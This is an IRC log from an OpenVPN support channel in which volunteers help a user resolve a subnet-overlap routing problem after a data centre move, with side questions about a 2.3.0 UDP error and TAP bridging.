08:07 <@ecrist> !diagram 08:07 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle 08:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 08:10 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 08:10 < jgspratt1> ecrist: http://hastebin.com/rotiyaqefa.1c 08:10 <@vpnHelper> Title: hastebin (at hastebin.com) 08:11 < jgspratt1> I had this all working before moving this data center to a new location and changing the IP addressing scheme on the server side to what it is now. 08:11 < jgspratt1> Basically, 10.25.1.102 can get to both clients, but 10.0.0.10 can only get to 10.25.1.101 08:14 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 08:16 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 08:23 < jgspratt1> ecrist: so, do you think my problem is with the route on the router? "add a route to the router so it knows how to reach the vpn subnet" (from http://ircpimps.org/serverlan.png ) 08:23 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Quit: Leaving] 08:27 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 08:28 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has joined #openvpn 08:28 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has quit [Changing host] 08:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:29 -!- DX099 [~DX099@2a01:e35:2eaf:e400:3dee:8180:898d:1df2] has joined #openvpn 08:29 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 08:29 < DX099> hello 08:29 < DX099> I have some problems connecting to some servers. My open-vpn client says something about timeout but I suspect port forwarding problems 08:30 < DX099> do I have to have some ports open ? 
How can I specify the server the range of ports that are available for it to connect to ? 08:30 <@ecrist> jgspratt1: can you post a traceroute for the failure? 08:31 < jgspratt1> ecrist: that's in http://hastebin.com/butabiqore.sm 08:31 <@vpnHelper> Title: hastebin (at hastebin.com) 08:31 < jgspratt1> "traceroute to 10.25.1.102" part starting at line 71 08:31 < jgspratt1> What should be in my ccd/ file for this client? 08:31 <@ecrist> when you say "10.25.1.102 can get to both clients" what do you mean? 08:32 < jgspratt1> I mean it can ping/ssh to 10.0.0.10 and 10.0.0.18 08:33 <@ecrist> which pastebin has your configs? 08:34 < jgspratt1> client.conf: http://hastebin.com/qaciwiwugu.vala ; server.conf: http://hastebin.com/papugiroce.vala 08:34 <@ecrist> is ip_forwarding enabled on your vpn server? 08:34 <@vpnHelper> Title: hastebin (at hastebin.com) 08:34 < jgspratt1> yes 08:34 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 08:34 <@ecrist> ugh 08:34 <@ecrist> !configs 08:34 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 08:35 <@ecrist> I'll put up with them for now, but in the future, remove all the comments 08:35 < jgspratt1> Thanks, will do. 08:35 < IT> does openvpn has any bandwight limitation buildin? 
08:36 <@ecrist> you need to add the line route 10.24.0.0 255.248.0.0 to your server config 08:36 < jgspratt1> Most recently, I had http://hastebin.com/webisidano.hs as my ccd file for the lone client 08:36 <@vpnHelper> Title: hastebin (at hastebin.com) 08:36 <@ecrist> you're pushing it, but you're not allowing openvpn to route it 08:36 <@ecrist> so, VPN clients are sending traffic to the VPN server for the subnet, but the server is dropping the traffic 08:37 < jgspratt1> oh, that makes sense. so, openvpn doesn't just "use" the linux routes? 08:37 <@ecrist> not internally 08:37 < jgspratt1> how can I see what routes it is using interally? is there a command for that? 08:38 <@ecrist> how about you just trust me 08:38 <@ecrist> it's using what you tell it to use in the config 08:40 < jgspratt1> Sounds good. Ok, I set that up, shipped the conf file, and restarted the server and client. Same issue. 08:41 <@ecrist> show me the new config, please 08:41 <@ecrist> and the CCD 08:41 <@ecrist> also 08:41 <@ecrist> !logs 08:41 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 08:45 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 260 seconds] 08:46 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 08:46 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 08:46 -!- mode/#openvpn [+v hazardous] by ChanServ 08:47 < jgspratt1> new server.conf: http://hastebin.com/cahixuxace.hs ; current ccd: http://hastebin.com/webisidano.hs ; server log: http://hastebin.com/qixihofogu.vbs ; client log: http://hastebin.com/juyifanobi.md 08:47 <@vpnHelper> Title: hastebin (at hastebin.com) 08:50 < jgspratt1> Is that CCD route wrong? 
08:50 < jgspratt1> I tried taking it out just now. 08:50 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 08:50 < jgspratt1> If I take it out, the client logs this: http://hastebin.com/jasogemaho.pas 08:50 <@vpnHelper> Title: hastebin (at hastebin.com) 08:50 * ecrist looks 08:51 <@ecrist> jgspratt1: for every push "route..." you have, you need a corresponding route line 08:52 <@ecrist> also, your version of OpenVPN is out of date 08:52 < jgspratt1> ecrist: ok, fair enough, how's this: http://hastebin.com/yexerafipa.hs 08:52 <@vpnHelper> Title: hastebin (at hastebin.com) 08:53 <@ecrist> jgspratt1: did you see line 34 in your server log? 08:53 <@ecrist> that's probably your routing issue 08:54 < jgspratt1> Oh, good call. How did I create that overlap? 08:54 <@ecrist> you tell me 08:54 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds] 08:55 < jgspratt1> Well, I specify that the local VPN has a range of 10.24.0.0/255.248.0.0 08:55 < jgspratt1> But the remote VPN is 10.0.0.0/24 08:55 <@ecrist> yeah, there's your overlap 08:55 < jgspratt1> But it says the "remote" VPN is in issue. 08:55 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has joined #openvpn 08:56 <@ecrist> openvpn seems to thing you're using 10.24.0.0/255.248.0.0 08:56 < jgspratt1> That's on a different LAN, right? 08:56 < jgspratt1> That's the entire local LAN, yes. 08:56 < jgspratt1> I want hosts to be able to get there. 08:56 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 08:56 < jgspratt1> From the remote side. 08:56 <@ecrist> i've gotta scoot for a bit, bbl 08:57 < jgspratt1> If I want to achieve http://hastebin.com/rotiyaqefa.1c where each host on that network can get to any other host, what's wrong with my config? 
08:57 <@vpnHelper> Title: hastebin (at hastebin.com) 08:58 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Operation timed out] 08:59 < jgspratt1> I should add to that diagram a bit: http://hastebin.com/mubijulata.1c 09:00 <@vpnHelper> Title: hastebin (at hastebin.com) 09:00 < jgspratt1> Can someone suggest a server config that would achieve this? 09:02 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 09:05 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection] 09:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 09:11 < jgspratt1> How does what I'm doing disagree with what http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is suggesting? 09:11 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 09:18 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:19 -!- jgspratt [~jgspratt@66.162.71.166] has joined #openvpn 09:19 -!- jgspratt1 [~jgspratt@66.162.71.166] has quit [Read error: Connection reset by peer] 09:22 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 246 seconds] 09:28 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 09:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 09:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 09:35 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:35 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:37 -!- DX099 [~DX099@2a01:e35:2eaf:e400:3dee:8180:898d:1df2] has quit [Quit: DX099] 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:38 -!- 
Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Remote host closed the connection] 09:38 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:39 < jgspratt> How does what I'm doing disagree with what http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is suggesting? 09:39 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 09:42 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Client Quit] 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:42 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:46 < jgspratt> Can someone suggest a server config that would achieve this? 09:46 < jgspratt> I'm trying to be able to ping from 10.0.0.10 to 10.25.1.102: http://hastebin.com/mubijulata.1c 09:46 <@vpnHelper> Title: hastebin (at hastebin.com) 09:48 < |Mike|> !configs jgspratt 09:48 < |Mike|> !tell jgspratt configs 09:49 < |Mike|> hrm, syntax changed? 09:49 < jgspratt> |Mike| wants me to tell you: configs 09:49 < jgspratt> But, sure, I can repost them, hang on. 09:49 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:49 < |Mike|> !configs 09:49 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. 
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 09:49 < |Mike|> !logs 09:49 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:50 < jgspratt> server: http://hastebin.com/yexerafipa.hs ; current ccd: http://hastebin.com/webisidano.hs ; server log: http://hastebin.com/qixihofogu.vbs ; client log: http://hastebin.com/juyifanobi.md 09:50 <@vpnHelper> Title: hastebin (at hastebin.com) 09:50 < jgspratt> I've also tried the ccd as just "iroute 10.0.0.0 255.255.255.0" 09:52 < jgspratt> Is what I'm trying to do possible with OpenVPN or do I need something commercial? 09:52 < jgspratt> I see the warning "WARNING: potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.24.0.0/255.248.0.0]" 09:52 < jgspratt> That must come from push "route 10.24.0.0 255.248.0.0" ; route 10.24.0.0 255.248.0.0 09:53 < jgspratt> However, those /are/ the LAN IP ranges on my server-side that I want my clients to be able to get to. 09:58 < jgspratt> |Mike|: here is an updated server log from a restart with the simple CCD: http://hastebin.com/jocavaraba.vbs 09:58 <@vpnHelper> Title: hastebin (at hastebin.com) 10:06 < jgspratt> How do I correctly specify the openvpn settings for my network topology? 10:06 < |Mike|> !topology 10:07 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. 
or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 10:07 < |Mike|> sorry, i'm a bit in a hurry here 10:07 < jgspratt> How can I avoid this network overlap problem but still be able to use openvpn to do something useful 10:08 < jgspratt> Is the server conf line `push "route 10.24.0.0 255.248.0.0"` correct or not? 10:09 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 10:09 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 10:10 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 10:11 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:13 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 10:13 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 10:13 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 10:13 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 10:19 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 10:21 -!- master_of_master [~master_of@p57B53BBC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 10:23 -!- master_of_master [~master_of@p57B54741.dip.t-dialin.net] has joined #openvpn 10:31 < jgspratt> Is there a way to fix thisa? 10:37 < jgspratt> Can you use OpenVPN to make a "site-to-site" thingie? 10:47 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 10:47 -!- mode/#openvpn [+v s7r] by ChanServ 10:55 < jgspratt> anyone? 10:58 < chrisb> i use openvpn between a local host and a remote server 10:58 < jgspratt> chrisb: do you know what I'm doing wrong routing-wise? 
10:58 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has quit [Read error: Connection reset by peer] 10:58 <@ecrist> jgspratt: if you read the !routing page throughouly, it should resolve your issues 10:59 <@ecrist> otherwise, I may be able to help again later today 10:59 < jgspratt> ecrist: yep, I read all of that 11:00 < jgspratt> can you explain why I'm getting the routing conflict? 11:00 < chrisb> jgspratt: i only route from a single local private net 192.168.x.x to the remote 11:00 < jgspratt> what should my server.conf say? 11:01 < jgspratt> with http://hastebin.com/mubijulata.1c should 10.0.0.10 be able to get to 10.25.1.102? 11:01 <@vpnHelper> Title: hastebin (at hastebin.com) 11:01 < jgspratt> chrisb: I'm trying to make that one client work for now. 11:02 < chrisb> oh, i see, it looks like addresses overlap...fix that conflict or NAT somehow 11:03 < jgspratt> "fix it"--can you offer any suggestions on a valid config? 11:03 < jgspratt> I realize and accept that my config is wrong. Granted. How do I make it correct based on my topology? 11:04 < jgspratt> What I'm trying to tell the client is "10.24/13 is on the server's network, go through the VPN tunnel" 11:05 < jgspratt> What the error says to me is "Your VPN server is on your destination network: it is 10.25.1.101 and your network is 10.24/13, so, error, error, that's an overlap." 11:06 -!- gojafe [~rasengan@eyearesee.com] has joined #openvpn 11:07 < chrisb> right, overlap, 11:08 < jgspratt> But that's actually the point. I am bridging the LANs. 11:08 < jgspratt> I want the server to be on the destination network. 11:08 -!- raidz_away is now known as raidz 11:08 < chrisb> they are subnets, as you have defined them 11:09 < jgspratt> Can you offer a valid config? 11:10 < chrisb> i can tell you are in a hurry, so I won't slow you down 11:10 < jgspratt> No, I've been doing this for a day 11:11 < jgspratt> No rush. 
Just looking for someone with more info than "your server is on the network you're trying to get to." 11:12 < jgspratt> To me, it looks like http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is telling me to do what I'm doing. 11:12 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 11:12 < chrisb> i have only used openvpn in one configuration local private network to remote vps, the bridge network, point-to-point is 10.x.x.x and then the vps routes to the public internet 11:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:14 < jgspratt> let's assume I'm trying to do that. how can I make it so my client can talk to my server network? 11:15 < jgspratt> Specifically, what should my server settings be so that I don't get an overlap problem, but so that openvpn does something useful? 11:16 <@EugeneKay> Move your client off the destination network. 11:16 <@EugeneKay> It's a circular route problem 11:17 <@EugeneKay> If they're not the same LAN then they shouldn't have the same subnet. Using a bridge is the wrong solution here. Change one of the subnets and set up routing between the two LANs, via the openvpn server/client 11:17 <@EugeneKay> !route 11:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 11:19 < chrisb> https://en.wikipedia.org/wiki/Private_network#Merging_private_networks 11:19 <@vpnHelper> Title: Private network - Wikipedia, the free encyclopedia (at en.wikipedia.org) 11:20 < jgspratt> EugeneKay: Move my client? 
It is on 10.0.0.0/24 for eth0 and 172.16.0.0/24 for tun0
11:20 < jgspratt> Neither of those ranges is on the server's LAN
11:21 <@EugeneKay> The client thinks there's an overlap
11:21 < jgspratt> 10.24.0.0/13 is not on 10.0.0.0/24
11:21 <@EugeneKay> Are you sure it's actually /24? ;-)
11:22 < chrisb> jgspratt: check the bits
11:22 < jgspratt> Yeah.
11:22 < jgspratt> Ok, on what?
11:22 < jgspratt> iroute 10.0.0.0 255.255.255.0
11:22 < jgspratt> push "route 10.0.0.0 255.255.255.0"
11:22 < jgspratt> route 10.0.0.0 255.255.255.0
11:22 < jgspratt> That's /24
11:23 <@EugeneKay> Your error message says otherwise
11:23 <@EugeneKay> I see the warning "WARNING: potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.24.0.0/255.248.0.0]"
11:23 < chrisb> jgspratt: you are the one with the routing problem
11:23 <@EugeneKay> Something isn't right there. Go fix it.
11:23 < chrisb> jgspratt: you couldn't route these with a regular router!
11:23 < jgspratt> The server can't be on the server's LAN?
11:24 <@EugeneKay> Your VPN subnet should not be within any LAN subnet....
11:24 <@EugeneKay> It should be a whole different block
11:24 < jgspratt> It's not. The tun interfaces are on 172.16.0.0/24
11:24 <@EugeneKay> Then what is 10.25.1.0/24?
11:25 < jgspratt> Part of 10.24.0.0/13, the server's LAN
11:25 < chrisb> oh my god
11:25 <@EugeneKay> Is that error message from the server or the client? I'm confused
11:25 -!- chrisb [~chrisb@li482-205.members.linode.com] has left #openvpn ["rcirc on GNU Emacs 23.4.1"]
11:25 <@EugeneKay> And you can't have a /24 that's "part of" a /13. This is not how CIDR works.
11:26 <@EugeneKay> It's either a conflict or it's a different block
11:26 <@EugeneKay> Fix it.
11:26 < jgspratt> No, that's on the server's log
11:27 <@EugeneKay> So, why does the server think that 10.24.0.0/13 is a block that openvpn should be handling? ;-)
11:27 -!- arekm [~arekm@pld-linux/arekm] has joined #openvpn
11:27 < jgspratt> Well, I'll simplify it to only be 10.25.0.0/24 on the east coast for now then.
11:27 < jgspratt> The server can get to all of 10.24/13
11:28 <@EugeneKay> So you have the server push that route to clients. The server itself shouldn't be getting that route via openvpn, because that's wrong
11:28 < arekm> hi. I wonder what could change between 2.2.2 and 2.3.0 that causes "write UDPv4: Invalid argument (code=22)" with exactly the same config
11:29 <@EugeneKay> If openvpn isn't going to be handling a block, don't tell it about it.
11:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 264 seconds]
11:30 < jgspratt> here, I simplified it: http://hastebin.com/damayulotu.vbs
11:30 <@vpnHelper> Title: hastebin (at hastebin.com)
11:31 < jgspratt> That's the server log now, with only 10.25/24 on the server
11:31 < jgspratt> "potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.25.0.0/255.255.0.0]"
11:31 <@EugeneKay> !configs
11:31 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
11:32 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.]
11:32 < jgspratt> http://hastebin.com/kavurivaca.hs
11:32 <@vpnHelper> Title: hastebin (at hastebin.com)
11:32 <@EugeneKay> Line 13 is wrong
11:32 <@EugeneKay> That should not exist
11:32 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
11:32 <@EugeneKay> So you have the server push that route to clients. The server itself shouldn't be getting that route via openvpn, because that's wrong
11:32 < jgspratt> Sorry, I put that in per someone else's request from a while ago.
11:33 <@EugeneKay> If your server has the route via a LAN adapter openvpn will notice the conflict. Which it did.
11:33 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
11:33 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Client Quit]
11:34 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf]
11:34 < jgspratt> Here is with that line removed: http://hastebin.com/focetuhiku.vbs
11:34 <@vpnHelper> Title: hastebin (at hastebin.com)
11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:35 < jgspratt> Same symptoms on client: http://hastebin.com/posuqiresa.hs
11:35 <@vpnHelper> Title: hastebin (at hastebin.com)
11:35 <@EugeneKay> See? No more conflict. Now you get to fix the next problem.
11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:35 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:35 -!- _fang0654 [~fang0654@cpe-68-174-236-234.nyc.res.rr.com] has joined #openvpn
11:35 < jgspratt> I didn't have the conflict before I added that line, but they said it wouldn't work without it, so I should add it.
11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:36 <@EugeneKay> Whoever said that was wrong
11:36 < jgspratt> But I'm glad we are making progress now! :)
11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:36 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Remote host closed the connection]
11:36 <@EugeneKay> This looks like a routing problem now. I'm guessing 10.25.1.101 is the server's LAN address, and .102 is another box on that same LAN?
11:36 <@EugeneKay> And that your server is NOT the default gw for most boxes on that same LAN?
11:36 < arekm> for my problem with Invalid argument 22 here is config, data, logs: http://pastebin.com/qUMLUm9r
11:37 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:37 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:37 < jgspratt> Well, should I be able to go from .102 to 10.0.0.10 if it's as you suspect?
11:37 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:37 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:38 <@EugeneKay> Nope
11:38 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:38 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:38 < jgspratt> But I added a route: http://hastebin.com/lamoboweca.vhdl
11:38 <@vpnHelper> Title: hastebin (at hastebin.com)
11:38 <@EugeneKay> On your default GW? OK, so that's good.
11:39 < jgspratt> In my sonicwall: http://hastebin.com/hokocahine.1c
11:39 <@vpnHelper> Title: hastebin (at hastebin.com)
11:39 <@EugeneKay> If pings are working one direction but not the other then it's gonna be a firewall
11:39 < jgspratt> Yeah, which is the default GW
11:39 < _fang0654> Probably a stupid question, but does broadcast traffic get passed over a TAP vpn?
11:39 <@EugeneKay> And I charge $150/hour to debug those
11:40 <@EugeneKay> _fang0654 - Layer2 traffic is passed over TAP, yes. Are you talking about bridging tap0 to eth0? Don't do that.
11:40 -!- Konigsberg7 [mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:40 -!- Konigsberg7 [mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:41 < _fang0654> EugeneKay: Ok cool. Just set up a bridge between two tomato routers to be on the same subnet, just wanted to make sure their poorly designed software would work
11:41 <@EugeneKay> Good luck. You'll need it. :-p
11:41 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has quit [Ping timeout: 255 seconds]
11:41 < _fang0654> Seems like it is working. Pretty slow though. Very poorly designed software :)
11:43 < arekm> any clues, things to check?
11:43 <@EugeneKay> arekm - not a clue.
11:44 < jgspratt> EugeneKay: I doubt it. These machines were running this very vpn for over a year.
11:44 <@EugeneKay> But bravo for trying 2.3!
11:44 < arekm> heh, ok, so no point in trying to debug this, downgrading :)
11:45 <@EugeneKay> Plenty of point; it's probably something obvious
11:45 <@EugeneKay> But I have $DAYJOB too
11:45 < arekm> downgraded and works
11:45 <@EugeneKay> A valid solution too
11:46 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn
11:46 < arekm> tried to see where "Invalid argument" is coming from via strace but likely it's not from any syscall
11:47 <@EugeneKay> Nah, it'll be an openvpn debug thing
11:47 <@EugeneKay> It's not one I've come across (or can remember) or I'd tell you what it means
11:47 <@EugeneKay> Googling probably isn't much help (I tried)
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:49 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
11:49 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:50 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
11:51 < arekm> UDPv4 write returned -1
11:51 < arekm> oh
11:51 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn
11:55 < arekm> (2.3 client works fine btw, only server has problems)
11:56 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf]
11:59 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
11:59 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
12:03 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
12:03 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
12:03 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
12:07 -!- valparaiso_ [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn
12:08 -!- valparaiso_ is now known as valparaiso
12:09 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:16 <@ecrist> what problem does the server have?
12:16 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has left #openvpn []
12:17 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:17 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
12:21 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:26 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye]
12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf]
12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:27 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
12:29 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:29 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
12:29 -!- BtbN [~btbn@btbn.de] has joined #openvpn
12:30 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
12:30 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
12:36 < _fang0654> Any way of having a tap tunnel intercept DHCP and not pass the requests to the other side of the tunnel?
12:37 <@EugeneKay> Yeah, don't use bridging. :-p
